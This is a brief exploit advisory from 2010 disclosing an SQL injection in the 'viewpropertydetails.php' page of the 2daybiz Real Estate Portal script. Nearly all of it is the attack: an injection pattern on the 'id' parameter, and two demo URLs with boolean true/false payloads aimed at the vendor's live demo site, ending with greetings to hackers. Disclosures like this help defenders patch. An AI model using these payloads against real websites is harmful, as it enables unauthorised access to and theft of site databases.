$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz Real Estate Portal "viewpropertydetails.php" SQL injection
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/realestate_portalscript.html
$ Date :06/24/2010
$
$******************************************************************************************
$Exploit:
$
$ http://server/viewpropertydetails.php?id=[id number][SQL]
$
$******************************************************************************************
$Demo:
$
$
$
http://www.2daybiz.com/products/realestate/viewpropertydetails.php?id=305%27%20and%201=1+--+
$
http://www.2daybiz.com/products/realestate/viewpropertydetails.php?id=305%27%20and%201=0+--+
$
$
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for
more security
$
$
$--------------------------------------------------------------------------------------------------------------------